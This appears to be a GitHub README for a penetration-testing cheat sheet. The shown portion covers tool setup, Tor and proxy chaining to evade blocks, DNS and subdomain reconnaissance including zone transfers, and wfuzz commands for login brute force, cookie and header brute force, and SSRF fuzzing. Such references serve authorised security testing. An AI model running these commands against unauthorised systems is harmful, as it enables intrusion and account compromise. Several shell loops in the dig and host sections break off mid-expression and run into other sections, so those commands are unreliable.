kraloveckey/fox

GitHub: kraloveckey/fox

一个面向渗透测试的代码片段与技巧合集,提供即用型命令与工具链以加速安全评估流程。

Stars: 1 | Forks: 0

# 🦊 Fox Cheat Sheet – Penetration Testing

[`Penetration testing (or PenTesting)`](https://en.wikipedia.org/wiki/Penetration_test) is the practice of launching authorized, simulated attacks against computer systems and their physical infrastructure to expose potential security weaknesses and vulnerabilities. The purpose of this simulated attack is to identify any weak spots in a system’s defenses which attackers could take advantage of. This is like a bank hiring someone to dress as a burglar and try to break into their building and gain access to the vault. If the 'burglar' succeeds and gets into the bank or the vault, the bank will gain valuable information on how they need to tighten their security measures. Should you discover a vulnerability, please follow [this guidance](https://kb.cert.org/vuls/guidance/) to report it responsibly. Websites that you should use while writing the report: * [SysReptor Github](https://github.com/Syslifters/sysreptor) or [SysReptor](https://labs.sysre.pt/) * [attack.mitre.org](https://attack.mitre.org) * [cwe.mitre.org/data](https://cwe.mitre.org/data) * [first.org/cvss/calculator/4.0](https://www.first.org/cvss/calculator/4.0) * [nvd.nist.gov/ncp/repository](https://nvd.nist.gov/ncp/repository) * [owasp.org/www-project-top-ten](https://owasp.org/www-project-top-ten) * [cheatsheetseries.owasp.org](https://cheatsheetseries.owasp.org/Glossary.html) ## Overview - [🦊 Fox Cheat Sheet – Penetration Testing](#-fox-cheat-sheet--penetration-testing) - [Overview](#overview) - [Fox Tips and Tricks](#fox-tips-and-tricks) - [0. Install and Setup Tools](#0-install-and-setup-tools) - [API Keys](#api-keys) - [User-Agents](#user-agents) - [DNS Resolvers](#dns-resolvers) - [ProxyChains-NG](#proxychains-ng) - [1. Reconnaissance](#1-reconnaissance) - [1.1 Useful Websites](#11-useful-websites) - [FOCA (Fingerprinting Organizations with Collected Archives)](#foca-fingerprinting-organizations-with-collected-archives) - [DNS](#dns) - [ASNmap](#asnmap) - [dig](#dig) - [DNSenum](#dnsenum) - [DNSmap](#dnsmap) - [DNSRecon](#dnsrecon) - [Fierce](#fierce) - [host](#host) - [nslookup](#nslookup) - [Nmap Enumaration](#nmap-enumaration) - [WHOIS](#whois) - [Amass](#amass) - [assetfinder](#assetfinder) - [Sublist3r](#sublist3r) - [Subfinder](#subfinder) - [httpx](#httpx) - [gau](#gau) - [urlhunter](#urlhunter) - [wfuzz](#wfuzz) - [Directory Fuzzing](#directory-fuzzing) - [dirb](#dirb) - [DirBuster](#dirbuster) - [Dirsearch](#dirsearch) - [feroxbuster](#feroxbuster) - [ffuf](#ffuf) - [gobuster](#gobuster) - [Google Dorks](#google-dorks) - [Chad](#chad) - [PhoneInfoga](#phoneinfoga) - [git-dumper](#git-dumper) - [TruffleHog](#trufflehog) - [katana](#katana) - [Scrapy Scraper](#scrapy-scraper) - [snallygaster](#snallygaster) - [IIS Tilde Short name Scanning](#iis-tilde-short-name-scanning) - [WhatWeb](#whatweb) - [Parsero](#parsero) - [EyeWitness](#eyewitness) - [Wordlists](#wordlists) - [2. Scanning/Enumeration](#2-scanningenumeration) - [2.1 Useful Websites](#21-useful-websites) - [masscan](#masscan) - [rustscan](#rustscan) - [Nmap](#nmap) - [NetExec](#netexec) - [NFS](#nfs) - [Samba](#samba) - [SNMP](#snmp) - [testssl.sh](#testsslsh) - [OpenSSL](#openssl) - [keytool](#keytool) - [uncover](#uncover) - [Databases](#databases) - [MYSQL](#mysql) - [MSSQL](#mssql) - [PostgreSQL](#postgresql) - [sqlite](#sqlite) - [Windows OS Enumeration](#windows-os-enumeration) - [Windows Basic Commands](#windows-basic-commands) - [nbtstat](#nbtstat) - [winfo](#winfo) - [nbtscan](#nbtscan) - [smblcient](#smblcient) - [rpcclient](#rpcclient) - [enum4linux](#enum4linux) - [3. Vulnerability Assesment/Exploiting](#3-vulnerability-assesmentexploiting) - [3.1 Useful Websites](#31-useful-websites) - [Collaborator Servers](#collaborator-servers) - [Subdomain Takeover](#subdomain-takeover) - [Search Exploits and Scanners](#search-exploits-and-scanners) - [Subzy](#subzy) - [subjack](#subjack) - [Nikto](#nikto) - [WPScan](#wpscan) - [Joomla](#joomla) - [Nuclei](#nuclei) - [Arjun](#arjun) - [Insecure Direct Object Reference (IDOR)](#insecure-direct-object-reference-idor) - [HTTP Response Splitting](#http-response-splitting) - [Cross-Site Scripting (XSS)](#cross-site-scripting-xss) - [SQL Injection](#sql-injection) - [sqlmap](#sqlmap) - [dotdotpwn](#dotdotpwn) - [Web Shells](#web-shells) - [Send a Payload With Python](#send-a-payload-with-python) - [SMTP](#smtp) - [4. Post Exploitation](#4-post-exploitation) - [4.1 Useful Websites](#41-useful-websites) - [Generate a Reverse Shell Payload](#generate-a-reverse-shell-payload) - [Generate a Reverse Shell Payload via MSFVenom](#generate-a-reverse-shell-payload-via-msfvenom) - [PowerShell Encoded Command](#powershell-encoded-command) - [Basics](#basics) - [Stabilizing Linux Shell](#stabilizing-linux-shell) - [Port Forwarding](#port-forwarding) - [SSH Port Forwarding](#ssh-port-forwarding) - [sshuttle](#sshuttle) - [chisel](#chisel) - [socat](#socat) - [Netcat Portfwd](#netcat-portfwd) - [Meterpreter Portfwd](#meterpreter-portfwd) - [ligolo-ng](#ligolo-ng) - [Transfering Files Windows](#transfering-files-windows) - [Transfering Files Linux](#transfering-files-linux) - [Exfiltrating Data](#exfiltrating-data) - [Linux Exfiltrating Data](#linux-exfiltrating-data) - [SSH Exfiltrating Data](#ssh-exfiltrating-data) - [Windows Exfiltrating Data](#windows-exfiltrating-data) - [Active Directory and Windows Lateral Movement](#active-directory-and-windows-lateral-movement) - [ASREPRoast](#asreproast) - [bloodyAD](#bloodyad) - [Bloodhound](#bloodhound) - [CrackMapExec](#crackmapexec) - [DCSync](#dcsync) - [dcom-exec](#dcom-exec) - [Decode Password](#decode-password) - [Evil-WinRM](#evil-winrm) - [kerbrute](#kerbrute) - [ntpdate](#ntpdate) - [powerview](#powerview) - [psexec](#psexec) - [Rubeus](#rubeus) - [RunasCs](#runascs) - [smbexec](#smbexec) - [wmiexec.py](#wmiexecpy) - [Linux Lateral Movement](#linux-lateral-movement) - [Linux Search Non-Secure Files](#linux-search-non-secure-files) - [Unsafe Bash](#unsafe-bash) - [base64](#base64) - [Powershell ToBase64String and Linux Base64](#powershell-tobase64string-and-linux-base64) - [5. Password Cracking](#5-password-cracking) - [5.1 Useful Websites](#51-useful-websites) - [crunch](#crunch) - [hash-identifier](#hash-identifier) - [Hashcat](#hashcat) - [Cracking the JWT](#cracking-the-jwt) - [Hydra](#hydra) - [John the Ripper](#john-the-ripper) - [Password Spraying](#password-spraying) - [6. Wi-Fi](#6-wi-fi) - [Pixie Dust](#pixie-dust) - [7. One-Liners for Bug Bounty](#7-one-liners-for-bug-bounty) - [8. Miscellaneous](#8-miscellaneous) - [8.1 Useful Websites](#81-useful-websites) - [cURL](#curl) - [Ncat](#ncat) - [Port Scanner](#port-scanner) - [Send Files](#send-files) - [Executing Remote Script](#executing-remote-script) - [Chat with Encryption](#chat-with-encryption) - [Banner Grabbing](#banner-grabbing) - [HTTPS-OpenSSL](#https-openssl) - [Catch Shell](#catch-shell) - [multi/handler](#multihandler) - [ngrok](#ngrok) - [Simple Web-Server](#simple-web-server) - [SSH](#ssh) - [swaks](#swaks) - [xfreerdp](#xfreerdp) - [Additional References](#additional-references) # Fox Tips and Tricks

Hello there! Don't miss out – let's check it out now 🦊



» All suggestions are welcome «

## 0. Install and Setup Tools **[`^ back to top ^`](#overview)** Most tools can be installed with the Linux package manager: apt update && apt -y install sometool For more information see [kali.org/tools](https://www.kali.org/tools). Some Python tools need to be downloaded and installed manually: python3 setup.py install Or, installed from the [pipx](https://pipx.pypa.io/): # https://github.com/pypa/pipx python3 -m pip install --user pipx python3 -m pipx ensurepath # Install an application globally: pipx install pycowsay pycowsay mooo # Run an application without installing: pipx run pycowsay moo Some Golang tools need to be downloaded and built manually: go build sometool.go Or, installed directly: go install -v [github.com/user/sometool@latest](https://github.com/user/sometool@latest) For more information see [pkg.go.dev](https://pkg.go.dev). To set up Golang, run: apt -y install golang echo "export GOROOT=/usr/lib/go" >> ~/.zshrc echo "export GOPATH=$HOME/go" >> ~/.zshrc echo "export PATH=$GOPATH/bin:$GOROOT/bin:$PATH" >> ~/.zshrc source ~/.zshrc If you use other console, you might need to write to `~/.bashrc`, etc. Some tools, that are in the form of binaries or shell scripts, can be moved to `/usr/bin/` directory for the ease of use: mv sometool.sh /usr/bin/sometool && chmod +x /usr/bin/sometool Some Java tools need to be downloaded and ran manually with Java (JRE): java -jar sometool.jar ### API Keys **[`^ back to top ^`](#overview)** List of useful APIs to integrate in your tools: * [shodan.io](https://developer.shodan.io) – IoT search engine and more. * [censys.io](https://search.censys.io/api) – domain lookup and more. * [github.com](https://github.com/settings/tokens) – public source code repository lookup. * [virustotal.com](https://developers.virustotal.com/reference/overview) – malware database lookup. * [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) – ProjectDiscovery tools ### User-Agents **[`^ back to top ^`](#overview)** Download a list of bot-safe User-Agents, requires [scrapeops.io](https://scrapeops.io) API key: python3 -c 'import json, requests; open("./user_agents.txt", "w").write(("\n").join(requests.get("[http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100](http://headers.scrapeops.io/v1/user-agents?api_key=SCRAPEOPS_API_KEY&num_results=100)", verify = False).json()["result"]))' ### DNS Resolvers **[`^ back to top ^`](#overview)** Download a list of trusted DNS resolvers, or manually from [trickest/resolvers](https://github.com/trickest/resolvers): python3 -c 'import json, requests; open("./resolvers.txt", "w").write(requests.get("[https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt](https://raw.githubusercontent.com/trickest/resolvers/main/resolvers-trusted.txt)", verify = False).text)' ### ProxyChains-NG **[`^ back to top ^`](#overview)** If Google or any other search engine or service blocks your tool, use ProxyChains-NG and Tor to bypass the restriction. Installation: apt update && apt -y install proxychains4 tor torbrowser-launcher Do the following changes in `/etc/proxychains4.conf`: round_robin chain_len = 1 proxy_dns remote_dns_subnet 224 tcp_read_time_out 15000 tcp_connect_time_out 8000 [ProxyList] socks5 127.0.0.1 9050 Make sure to comment any chain type other than `round_robin` – e.g., comment `strict_chain` into `# strict_chain`. Start Tor: service tor start Then, run any tool you want: proxychains4 sometool Using only Tor most likely won't be enough, you will need to add more proxies \([1](https://geonode.com/free-proxy-list)\)\([2](https://proxyscrape.com/home)\) to `/etc/proxychains4.conf`; however, it is hard to find free and stable proxies that are not already blacklisted. Download a list of free proxies: curl -s '[https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc](https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc)' -H 'Referer: [https://proxylist.geonode.com/](https://proxylist.geonode.com/)' | jq -r '.data[] | "\(.protocols[]) \(.ip) \(.port)"' > proxychains.txt curl -s '[https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc](https://proxylist.geonode.com/api/proxy-list?limit=50&page=1&sort_by=lastChecked&sort_type=desc)' -H 'Referer: [https://proxylist.geonode.com/](https://proxylist.geonode.com/)' | jq -r '.data[] | "\(.protocols[])://\(.ip):\(.port)"' > proxies.txt ## 1. Reconnaissance **[`^ back to top ^`](#overview)** ### 1.1 Useful Websites **[`^ back to top ^`](#overview)** **Domain, IP & Network Reconnaissance** * [whois.domaintools.com](https://whois.domaintools.com) – domain WHOIS lookup. * [dnsdumpster.com](https://dnsdumpster.com/) – DNS recon and research. * [network-tools.com](https://network-tools.com/nslook/) – network troubleshooting tools. * [dnsqueries.com](https://www.dnsqueries.com/en/) – DNS diagnostic tools. * [mxtoolbox.com](https://mxtoolbox.com/) – DNS, SMTP, and blacklist checks. * [otx.alienvault.com](https://otx.alienvault.com) – domain lookup. * [reverseip.domaintools.com](https://reverseip.domaintools.com) – web-based reverse IP lookup. * [lookup.icann.org](https://lookup.icann.org) – ICANN registration data lookup. * [sitereport.netcraft.com](https://sitereport.netcraft.com) – website infrastructure profiling. * [searchdns.netcraft.com](https://searchdns.netcraft.com) – web-based DNS lookup. * [search.censys.io](https://search.censys.io) – domain lookup and more. * [crt.sh](https://crt.sh) – certificate fingerprinting. * [radar.cloudflare.com](https://radar.cloudflare.com) – website lookup and more. * [dnschecker.org](https://dnschecker.org/) – global DNS propagation check. * [haveibeensquatted.com](https://haveibeensquatted.com/) – check for typosquatting domains. * [ifconfig.io](https://ifconfig.io/) – network info. * [abuseipdb.com](https://www.abuseipdb.com/) – check IP reputation and threat intelligence. * [ipvoid.com](https://www.ipvoid.com/) – IP blacklists and tools. * [myip.ms](https://myip.ms/) – IP address information. * [search.arin.net](https://search.arin.net/) – ARIN IP/ASN search. * [macaddress.io](https://macaddress.io/) – MAC address vendor lookup. * [iknowwhatyoudownload.com](https://iknowwhatyoudownload.com/en/peer/) – discover torrent downloads by IP. * [opencellid.org](https://opencellid.org/) – cell tower locations for OSINT. **OSINT Frameworks & Search** * [commoncrawl.org](https://commoncrawl.org/get-started) – web crawl dumps. * [searchcode.com](https://searchcode.com) – source code search engine. * [archive.org](https://archive.org) – wayback machine. * [shodan.io](https://www.shodan.io) – IoT search engine. * [whoisds.com](https://www.whoisds.com/newly-registered-domains) – newly registered domains. * [osintframework.com](https://osintframework.com/) – huge collection of OSINT tools. * [nitinpandey.in/ihunt](https://nitinpandey.in/ihunt/) – complete OSINT framework. * [abhijithb200.github.io/investigator](https://abhijithb200.github.io/investigator/) – OSINT tools aggregator. * [cybersec.org/search/index.php](https://cybersec.org/search/index.php) – specialized cybersecurity search engine. * [extract.pics](https://extract.pics/) – extract images from websites. **People, Accounts & Breaches** * [haveibeenpwned.com](https://haveibeenpwned.com) – check if email/phone was compromised in a breach. * [haveibeenpwned.com/Passwords](https://haveibeenpwned.com/Passwords) – Pwned passwords lookup. * [intelx.io](https://intelx.io) – database breaches. * [search.wikileaks.org](https://search.wikileaks.org) – WikiLeaks document search. * [pgp.circl.lu](https://pgp.circl.lu) – OpenPGP key server. * [sherlockeye.io](https://sherlockeye.io) – account lookup. * [whatsmyname.app](https://whatsmyname.app/) – username enumeration across sites. * [usersearch.ai](https://usersearch.ai/) – username OSINT. * [sec.hpi.de/ilc/](https://sec.hpi.de/ilc/?) – identity leak checker. * [bugmenot.com](http://bugmenot.com/) – bypass forced logins with shared accounts. **Malware Analysis & Threat Intel (Sandboxes)** * [opendata.rapid7.com](https://opendata.rapid7.com) – scan dumps. * [virustotal.com](https://www.virustotal.com/gui/home/search) – malware database lookup. * [virusscan.jotti.org](https://virusscan.jotti.org/en-US/scan-file) – free online malware scanner. * [filescan.io](https://www.filescan.io/scan) – next-gen malware analysis platform. * [virscan.org](https://www.virscan.org/) – multi-engine file scanner. * [docguard.io](https://www.docguard.io/) – document malware analysis. * [tria.ge](https://tria.ge/login) – malware analysis sandbox. * [filesec.io](https://filesec.io/) – latest file extension security intel. * [threatfox.abuse.ch](https://threatfox.abuse.ch/browse/) – share and search indicators of compromise (IOCs). * [urlscan.io](https://urlscan.io/) – sandbox for URLs. * [url2png.com](https://www.url2png.com/) – secure website screenshots. * [phishtank.org](https://phishtank.org/) – phishing URL database. **[`^ back to top ^`](#overview)** ### FOCA (Fingerprinting Organizations with Collected Archives) [`FOCA (Fingerprinting Organizations with Collected Archives)`](https://github.com/ElevenPaths/FOCA) – Find metadata and hidden information in files. Minimum requirements: * Microsoft Windows (64 bits). Versions 7, 8, 8.1 and 10. * Download and install [MS SQL Server 2014 Express](https://www.microsoft.com/en-us/download/details.aspx?id=42299) or greater. * Download and install [MS .NET Framework 4.7.1 Runtime](https://dotnet.microsoft.com/download/dotnet-framework/net471) or greater. * Download and install [MS Visual C++ 2010 (64-bit)](https://www.microsoft.com/en-us/download/developer-tools.aspx) or greater. * Download and install [FOCA](https://github.com/ElevenPaths/FOCA/releases). GUI is very intuitive. ### DNS **[`^ back to top ^`](#overview)** #### ASNmap **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/projectdiscovery/asnmap/cmd/asnmap@latest](https://github.com/projectdiscovery/asnmap/cmd/asnmap@latest) Get the ProjectDiscovery API key from [cloud.projectdiscovery.io](https://cloud.projectdiscovery.io) and run: asnmap -auth Fetch ASN for IP: asnmap --silent -r resolvers.txt -i ip | tee -a asnmap_asn_results.txt Fetch CIDRs for ASN: asnmap --silent -r resolvers.txt -a asn | tee -a asnmap_cidr_results.txt **If ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not be all within your scope!** Fetch CIDRs for organization ID: asnmap --silent -r resolvers.txt -org id | tee -a asnmap_cidr_results.txt #### dig **[`^ back to top ^`](#overview)** Fetch name servers: dig +noall +answer -t NS somedomain.com Fetch mail exchange servers: dig +noall +answer -t MX somedomain.com Interrogate a name server: dig +noall +answer -t ANY somedomain.com @ns.somedomain.com dig any DOMAIN @IP_OR_DOMAIN Fetch the zone file from a name server: dig +noall +answer -t AXFR somedomain.com @ns.somedomain.com dig axfr DOMAIN @IP_OR_DOMAIN After that test nameservers: `host -l < domain > < nameserver >` host -l domain.com ns2.domain.com Reverse IP lookup: dig +noall +answer -x 192.168.8.5 Subdomain Takeover Check if subdomains are dead, look for `NXDOMAIN`, `SERVFAIL`, or `REFUSED` status codes: for subdomain in $(cat subdomains.txt); do res=$(dig "${subdomain}" -t A +noall +comments +timeout=3 | grep -Po '(?<=status\:\ )[^\s]+(? Brute Force, the file is saved in `/tmp`: dnsmap targetdomain.com -r #### DNSRecon **[`^ back to top ^`](#overview)** DNSRecon DNS Brute Force: dnsrecon -d TARGET -D /usr/share/wordlists/dnsmap.txt -t std --xml ouput.xml Interrogate name servers: dnsrecon -t std --json /root/Desktop/dnsrecon_std_results.json -d somedomain.com dnsrecon -t axfr --json /root/Desktop/dnsrecon_axfr_results.json -d somedomain.com dnsrecon --iw -f --threads 50 --lifetime 3 -t brt --json /root/Desktop/dnsrecon_brt_results.json -D subdomains-top1mil.txt -d somedomain.com DNSRecon can perform a dictionary attack with a user-defined wordlist, but make sure to specify a full path to the wordlist; otherwise, DNSRecon might not recognize it. Make sure to specify a full path to the output file; otherwise, it will default to `/usr/share/dnsrecon/` directory, i.e., to the root directory. Extract subdomains from the results: jq -r '.[] | select(.type | test("^A$|^CNAME$|^SRV$")) | .name // empty, .target // empty' dnsrecon_std_results.json | sort -uf | tee -a subdomains.txt Extract IPs from the results: jq -r '.[] | select(.type | test("^A$|^CNAME$|^PTR$")) | .address // empty' dnsrecon_std_results.json | sort -uf | tee -a ips.txt Extract canonical names (CNAMEs) from the results: jq -r '.[] | select(.type | test("^CNAME$")) | .target // empty' dnsrecon_std_results.json | sort -uf | tee -a cnames.txt Reverse IP lookup: dnsrecon --json /root/Desktop/dnsrecon_ptr_results.json -s -r 192.168.8.0/24 Extract subdomains from the reverse IP lookup results: jq -r '.[] | if type == "array" then .[].name else empty end' dnsrecon_ptr_results.json | sort -uf | tee -a subdomains.txt #### Fierce **[`^ back to top ^`](#overview)** Interrogate name servers: fierce -dns targetdomain.com fierce -file fierce_std_results.txt --domain somedomain.com fierce -file fierce_brt_results.txt --subdomain-file subdomains-top1mil.txt --domain somedomain.com **By default, Fierce will perform dictionary attack with its built-in wordlist.** #### host **[`^ back to top ^`](#overview)** **Some DNS servers will not respond to DNS quieries of type 'ANY', use type 'A' instead.** Gather IPs for the given subdomains (ask for `A` records): for subdomain in $(cat subdomains.txt); do res=$(host -t A "${subdomain}" | grep -Po '(?<=has\ address\ )[^\s]+(? host -t ns domain.com After that test nameservers: host -l < domain > < nameserver > host -l domain.com ns2.domain.com #### Nmap Enumaration **[`^ back to top ^`](#overview)** nmap -F --dns-server #### WHOIS **[`^ back to top ^`](#overview)** Gather ASNs from IPs: for ip in $(cat ips.txt); do res=$(whois -h whois.cymru.com "${ip}" | grep -Poi '^\d+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_asns.txt grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_asns.txt | sort -uf | tee -a asns.txt **If ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not be all within your scope!** Gather organization names from IPs: for ip in $(cat ips.txt); do res=$(whois -h whois.arin.net "${ip}" | grep -Po '(?<=OrgName\:)[\s]+\K.+'); if [[ ! -z $res ]]; then echo "${ip} | ${res//$'\n'/ | }"; fi; done | sort -uf | tee -a ips_to_organization_names.txt grep -Po '(?<=\|\ )(?(?!\ \|).)+' ips_to_organization_names.txt | sort -uf | tee -a organization_names.txt Check if any of the IPs belong to [GitHub](https://github.com) organization, read more about GitHub takeover in this [H1 article](https://www.hackerone.com/application-security/guide-subdomain-takeovers). ### Amass **[`^ back to top ^`](#overview)** Gather subdomains using OSINT: amass enum -o amass_results.txt -trf resolvers.txt -d somedomain.com **Amass has built-in DNS resolvers.** Extract IPs from the results: grep '(?<=(?:a_record|contains)\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a ips.txt Extract subdomains from the results: grep '^[^\s]+(?=\ \(FQDN\))|(?<=ptr_record\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a subdomains.txt Extract canonical names (CNAMEs) from the results: grep '(?<=(?:a_record|contains)\ \-\-\>\ )[^\s]+' amass_results.txt | sort -uf | tee -a cnames.txt The below ASN and CIDR scans will take a long time to finish. **If ASN belongs to a cloud provider, you will get a lot of CIDRs / IPs, which might not be all within your scope!** Gather subdomains from ASN: amass intel -o amass_asn_results.txt -trf resolvers.txt -asn 13337 Gather subdomains from CIDR: amass intel -o amass_cidr_results.txt -trf resolvers.txt -cidr 192.168.8.0/24 ### assetfinder **[`^ back to top ^`](#overview)** Gather subdomains using OSINT: assetfinder --subs-only somedomain.com | grep -v '*' | tee assetfinder_results.txt ### Sublist3r **[`^ back to top ^`](#overview)** Gather subdomains using OSINT: sublist3r -o sublister_results.txt -d somedomain.com ### Subfinder **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest](https://github.com/projectdiscovery/subfinder/v2/cmd/subfinder@latest) Gather subdomains using OSINT: subfinder -t 10 -timeout 3 -nW -o subfinder_results.txt -rL resolvers.txt -d somedomain.com **Subfinder has built-in DNS resolvers.** Set your API keys in `/root/.config/subfinder/provider-config.yaml` file as following: shodan: - SHODAN_API_KEY censys: - CENSYS_API_ID:CENSYS_API_SECRET github: - GITHUB_API_KEY virustotal: - VIRUSTOTAL_API_KEY ### httpx **[`^ back to top ^`](#overview)** Check if subdomains are alive, map live hosts: httpx-toolkit -o httpx_results.txt -l subdomains.txt httpx-toolkit -random-agent -json -o httpx_results.json -threads 100 -timeout 3 -l subdomains.txt -ports 80,81,443,4443,8000,8008,8080,8081,8403,8443,8888,9000,9008,9080,9081,9403,9443 Filter out subdomains from the JSON results: jq -r 'select(."status_code" | tostring | test("^2|^3|^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long.txt jq -r 'select(."status_code" | tostring | test("^2")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx.txt jq -r 'select(."status_code" | tostring | test("^2|^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_2xx_4xx.txt jq -r 'select(."status_code" | tostring | test("^3")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_3xx.txt jq -r 'select(."status_code" | tostring | test("^401$")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_401.txt jq -r 'select(."status_code" | tostring | test("^403$")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_403.txt jq -r 'select(."status_code" | tostring | test("^4")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_4xx.txt jq -r 'select(."status_code" | tostring | test("^5")).url' httpx_results.json | sort -uf | tee -a subdomains_live_long_5xx.txt grep -Po 'http\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_http.txt grep -Po 'https\:\/\/[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_long_https.txt grep -Po '(?<=\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short.txt grep -Po '(?<=http\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_http.txt grep -Po '(?<=https\:\/\/)[^\s]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live_short_https.txt grep -Po '(?<=\:\/\/)[^\s\:]+' subdomains_live_long.txt | sort -uf | tee -a subdomains_live.txt Check if a path exists on a web server: httpx-toolkit -status-code -content-length -o httpx_results.txt -l subdomains_live_long.txt -path /.git ### gau **[`^ back to top ^`](#overview)** Gather URLs from the [wayback machine](https://archive.org): getallurls somedomain.com | tee gau_results.txt for subdomain in $(cat subdomains_live.txt); do getallurls "${subdomain}"; done | sort -uf | tee gau_results.txt Filter out URLs from the results: httpx-toolkit -random-agent -json -o httpx_gau_results.json -threads 100 -timeout 3 -r resolvers.txt -l gau_results.txt jq -r 'select(."status_code" | tostring | test("^2")).url' httpx_gau_results.json | sort -uf | tee -a gau_2xx_results.txt jq -r 'select(."status_code" | tostring | test("^2|^4")).url' httpx_gau_results.json | sort -uf | tee -a gau_2xx_4xx_results.txt jq -r 'select(."status_code" | tostring | test("^3")).url' httpx_gau_results.json | sort -uf | tee -a gau_3xx_results.txt jq -r 'select(."status_code" | tostring | test("^401$")).url' httpx_gau_results.json | sort -uf | tee -a gau_401_results.txt jq -r 'select(."status_code" | tostring | test("^403$")).url' httpx_gau_results.json | sort -uf | tee -a gau_403_results.txt ### urlhunter **[`^ back to top ^`](#overview)** Installation: go install -v [github.com/utkusen/urlhunter@latest](https://github.com/utkusen/urlhunter@latest) Gather URLs from URL shortening services: urlhunter -o urlhunter_results.txt -date latest -keywords subdomains_live.txt ### wfuzz **[`^ back to top ^`](#overview)** Wfuzz has been created to facilitate the task in web applications assessments and it is based on a simple concept: it replaces any reference to the `FUZZ` keyword by the value of a given payload. pipx install wfuzz Let's search the subdomains with wfuzz: wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-5000.txt -u "" -H "Host: FUZZ." --hl 7 wfuzz -c -w /usr/share/seclists/Discovery/DNS/subdomains-top1million-20000.txt --hc 400,404,403 -H "Host: FUZZ." -u http:// -t 100 wfuzz -H "Host: FUZZ." --hw 11 -c -z file,"/usr/share/wordlists/seclists/Discovery/DNS/subdomains-top1million-5000.txt" http:/// Fuzz directories: wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u [https://somesite.com/WFUZZ](https://somesite.com/WFUZZ) -w directory-list-lowercase-2.3-medium.txt Let's search the directories and files with wfuzz: wfuzz -c -z file,/usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt --sc 200,202,204,301,302,307,403 http:///FUZZ Login Form bruteforce. POST, Single list, filter string (hide): wfuzz -c -w users.txt --hs "Login name" -d "name=FUZZ&password=FUZZ&autologin=1&enter=Sign+in" http:///zabbix/index.php #Here we have filtered by line Login Form bruteforce. POST, 2 lists, filter code (show): wfuzz.py -c -z file,users.txt -z file,pass.txt --sc 200 -d "name=FUZZ&password=FUZ2Z&autologin=1&enter=Sign+in" http:///zabbix/index.php #Here we have filtered by code Login Form bruteforce. GET, 2 lists, filter string (show), proxy, cookies: wfuzz -c -w users.txt -w pass.txt --ss "Welcome " -p 127.0.0.1:8080:HTTP -b "PHPSESSIONID=1234567890abcdef;customcookie=hey" "[http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in](http://example.com/index.php?username=FUZZ&password=FUZ2Z&action=sign+in)" Cookie/Header bruteforce (vhost brute). Cookie, filter code (show), proxy: wfuzz -c -w users.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "Cookie:id=1312321&user=FUZZ" "[http://example.com/index.php](http://example.com/index.php)" Cookie/Header bruteforce (vhost brute). User-Agent, filter code (hide), proxy: wfuzz -c -w user-agents.txt -p 127.0.0.1:8080:HTTP --ss "Welcome " -H "User-Agent: FUZZ" "[http://example.com/index.php](http://example.com/index.php)" Fuzz parameter values: wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?someparam=WFUZZ](https://somesite.com/someapi?someparam=WFUZZ)" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "someparam=WFUZZ" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "{\"someparam\": \"WFUZZ\"}" -w somewordlist.txt Fuzz parameters: wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?WFUZZ=somevalue](https://somesite.com/someapi?WFUZZ=somevalue)" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/x-www-form-urlencoded" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "WFUZZ=somevalue" -w somewordlist.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X POST -H "Content-Type: application/json" -u "[https://somesite.com/someapi](https://somesite.com/someapi)" -d "{\"WFUZZ\": \"somevalue\"}" -w somewordlist.txt Additional example, internal SSRF fuzzing: wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?url=127.0.0.1:WFUZZ](https://somesite.com/someapi?url=127.0.0.1:WFUZZ)" -w ports.txt wfuzz -t 30 -f wfuzz_results.txt --hc 404,405 -X GET -u "[https://somesite.com/someapi?url=WFUZZ:80](https://somesite.com/someapi?url=WFUZZ:80)" -w ips.txt | Option | Description | | --- 